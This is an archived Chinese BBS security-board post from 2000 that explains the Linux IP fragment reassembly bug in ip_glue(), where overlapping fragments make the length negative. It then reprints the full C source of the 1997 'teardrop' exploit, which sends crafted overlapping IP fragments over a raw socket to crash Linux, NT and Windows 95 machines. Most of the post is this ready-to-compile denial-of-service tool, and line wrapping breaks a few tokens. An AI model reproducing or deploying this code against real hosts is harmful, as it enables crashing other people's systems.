📄 445.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="319.htm">上一层</a>][<a href="446.htm">下一篇</a>]
<hr><p align="left"><small>发信人: Luther (国际竞争不信眼泪), 信区: Security <br>
标 题: 常用攻击程序----Teardrop源代码 <br>
发信站: 武汉白云黄鹤站 (Sun Apr 2 18:53:54 2000), 站内信件 <br>
<br>
在Linux的ip包重组过程中有一个严重的漏洞。 <br>
在ip_glue()中: <br>
在循环中重组ip包: <br>
fp = qp->fragments; <br>
while(fp != NULL) <br>
{ <br>
if(count+fp->len > skb->len) <br>
{ <br>
error_to_big; <br>
} <br>
memcpy((ptr + fp->offset), fp->ptr, fp->len); <br>
count += fp->len; <br>
fp = fp->next; <br>
} <br>
这里只检查了长度过大的情况,而没有考虑长度过小的情况, <br>
如 fp->len<0 时,也会使内 拷贝过多的东西。 <br>
计算分片的结束位置: <br>
end = offset + ntohs(iph->tot_len) - ihl; <br>
当发现当前包的偏移已经在上一个包的中间时(即两个包是重叠的) <br>
是这样处理的: <br>
if (prev != NULL && offset < prev->end) <br>
{ <br>
i = prev->end - offset; <br>
offset += i; /* ptr into datagram */ <br>
ptr += i; /* ptr into fragment data */ <br>
} <br>
/* Fill in the structure. */ <br>
fp->offset = offset; <br>
fp->end = end; <br>
fp->len = end - offset; //fp->len是一个有符号整数 <br>
举个例子来说明这个漏洞: <br>
第一个碎片:mf=1 offset=0 payload=20 <br>
敌二个碎片:mf=0 offset=10 payload=9 <br>
这样第一个碎片的 end=0+20 <br>
offset=0 <br>
这样第二个碎片的 end=9+10=19 <br>
offset=offset+(20-offset)=20 <br>
fp-〉len=19-20=-1; <br>
那么memcpy将拷贝过多的数据导致崩溃。 <br>
/* <br>
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97 <br>
* <br>
* Linux/NT/95 Overlap frag bug exploit <br>
* <br>
* Exploits the overlapping IP fragment bug present in all Linux kernels an <br>
d <br>
* NT 4.0 / Windows 95 (others?) <br>
* <br>
* Based off of: flip.c by klepto <br>
* Compiles on: Linux, *BSD* <br>
* <br>
* gcc -O2 teardrop.c -o teardrop <br>
* OR <br>
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING <br>
*/ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <unistd.h> <br>
#include <string.h> <br>
#include <netdb.h> <br>
#include <netinet/in.h> <br>
#include <netinet/udp.h> <br>
#include <arpa/inet.h> <br>
#include <sys/types.h> <br>
#include <sys/time.h> <br>
#include <sys/socket.h> <br>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING <br>
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 <br>
*/ <br>
#define FIX(n) (n) <br>
#else /* OpenBSD 2.1, all Linux */ <br>
#define FIX(n) htons(n) <br>
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */ <br>
#define IP_MF 0x2000 /* More IP fragment en route */ <br>
#define IPH 0x14 /* IP header size */ <br>
#define UDPH 0x8 /* UDP header size */ <br>
#define PADDING 0x1c /* datagram frame padding for first packet */ <br>
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 * <br>
/ <br>
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can <br>
* withstand maybe 5 or 10 sometimes... Experiment. <br>
<br>
*/ <br>
void usage(u_char *); <br>
u_long name_resolve(u_char *); <br>
u_short in_cksum(u_short *, int); <br>
void send_frags(int, u_long, u_long, u_short, u_short); <br>
int main(int argc, char **argv) <br>
{ <br>
int one = 1, <br>
count = 0, <br>
i, <br>
rip_sock; <br>
u_long src_ip = 0, dst_ip = 0; <br>
u_short src_prt = 0, dst_prt = 0; <br>
struct in_addr addr; <br>
fprintf(stderr, "teardrop route|daemon9\n\n"); <br>
//建SOCK_RAW <br>
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) <br>
{ <br>
perror("raw socket"); <br>
exit(1); <br>
} <br>
//由系统处理IP校验和。 <br>
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(on <br>
e)) <br>
< 0) <br>
< 0) <br>
{ <br>
perror("IP_HDRINCL"); <br>
exit(1); <br>
} <br>
if (argc < 3) usage(argv[0]); <br>
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2] <br>
))) <br>
{ <br>
fprintf(stderr, "What the hell kind of IP address is that?\n"); <br>
exit(1); <br>
} <br>
while ((i = getopt(argc, argv, "s:t:n:")) != EOF) <br>
{ <br>
switch (i) <br>
{ <br>
case 's': /* source port (should be emphemeral) */ <br>
<br>
src_prt = (u_short)atoi(optarg); <br>
break; <br>
case 't': /* dest port (DNS, anyone?) */ <br>
dst_prt = (u_short)atoi(optarg); <br>
break; <br>
case 'n': /* number to send */ <br>
count = atoi(optarg); <br>
break; <br>
default : <br>
usage(argv[0]); <br>
break; /* NOTREACHED */ <br>
} <br>
} <br>
srandom((unsigned)(time((time_t)0))); <br>
if (!src_prt) src_prt = (random() % 0xffff); <br>
if (!dst_prt) dst_prt = (random() % 0xffff); <br>
if (!count) count = COUNT; <br>
fprintf(stderr, "Death on flaxen wings:\n"); <br>
addr.s_addr = src_ip; <br>
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); <br>
addr.s_addr = dst_ip; <br>
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); <br>
fprintf(stderr, " Amt: %5d\n", count); <br>
fprintf(stderr, "[ "); <br>
for (i = 0; i < count; i++) <br>
{ <br>
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); <br>
fprintf(stderr, "b00m "); <br>
usleep(500); <br>
} <br>
fprintf(stderr, "]\n"); <br>
return (0); <br>
} <br>
/* <br>
* Send two IP fragments with pathological offsets. We use an implementati <br>
on <br>
* independent way of assembling network packets that does not rely on any <br>
of <br>
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD). <br>
<br>
*/ <br>
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, <br>
u_short dst_prt) <br>
{ <br>
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ <br>
u_char byte; /* a byte */ <br>
struct sockaddr_in sin; /* socket protocol structure */ <br>
sin.sin_family = AF_INET; <br>
sin.sin_port = src_prt; <br>
sin.sin_addr.s_addr = dst_ip; <br>
/* <br>
* Grab some memory for our packet, align p_ptr to point at the beginnin <br>
g <br>
* of our packet, and then fill it with zeros. <br>
*/ <br>
packet = (u_char *)malloc(IPH + UDPH + PADDING); <br>
p_ptr = packet; <br>
bzero((u_char *)p_ptr, IPH + UDPH + PADDING); <br>
byte = 0x45; /* IP version and header length */ <br>
memcpy(p_ptr, &byte, sizeof(u_char)); <br>
p_ptr += 2; /* IP TOS (skipped) */ <br>
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */ <br>
p_ptr += 2; <br>
*((u_short *)p_ptr) = htons(242); /* IP id */ <br>
p_ptr += 2; <br>
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ <br>
p_ptr += 2; <br>
*((u_short *)p_ptr) = 0x40; /* IP TTL */ <br>
byte = IPPROTO_UDP; <br>
memcpy(p_ptr + 1, &byte, sizeof(u_char)); <br>
p_ptr += 4; /* IP checksum filled in by kernel * <br>
/ <br>
*((u_long *)p_ptr) = src_ip; /* IP source address */ <br>
p_ptr += 4; <br>
*((u_long *)p_ptr) = dst_ip; /* IP destination address */ <br>
p_ptr += 4; <br>
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ <br>
p_ptr += 2; <br>
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ <br>
p_ptr += 2; <br>
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ <br>
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&si <br>
n, <br>
sizeof(struct sockaddr)) == -1) <br>
{ <br>
perror("\nsendto"); <br>
free(packet); <br>
exit(1); <br>
} <br>
/* We set the fragment offset to be inside of the previous packet's <br>
* payload (it overlaps inside the previous packet) but do not include <br>
* enough payload to cover complete the datagram. Just the header will <br>
<br>
<br>
* do, but to crash NT/95 machines, a bit larger of packet seems to wor <br>
k <br>
* better. <br>
*/ <br>
p_ptr = &packet[2]; /* IP total length is 2 bytes into the heade <br>
r */ <br>
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1); <br>
p_ptr += 4; /* IP offset is 6 bytes into the header */ <br>
*((u_short *)p_ptr) = FIX(MAGIC); <br>
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin, <br>
sizeof(struct sockaddr)) == -1) <br>
{ <br>
perror("\nsendto"); <br>
free(packet); <br>
exit(1); <br>
} <br>
free(packet); <br>
} <br>
u_long name_resolve(u_char *host_name) <br>
{ <br>
struct in_addr addr; <br>
struct hostent *host_ent; <br>
if ((addr.s_addr = inet_addr(host_name)) == -1) <br>
{ <br>
if (!(host_ent = gethostbyname(host_name))) return (0); <br>
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length); <br>
} <br>
return (addr.s_addr); <br>
} <br>
void usage(u_char *name) <br>
{ <br>
fprintf(stderr, <br>
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\ <br>
n", <br>
name); <br>
exit(0); <br>
} <br>
<br>
-- <br>
┏┓ ┏┓ ━┓ ┏┓ ━┓ ォォ <br>
┃┃ ┃┃┃┃ 珐畅 З哗咯 ┃ ━┫ ┃ ━ ┃ <br>
┗┓ ┛┃ ┃┃ З畅珐 ┃ ━┫ 签珐 <br>
━┛ ━━┛ ┗┛ 哗咯哗 ━━┛ 哗咯哗 <br>
<br>
<br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="319.htm">上一层</a>][<a href="446.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -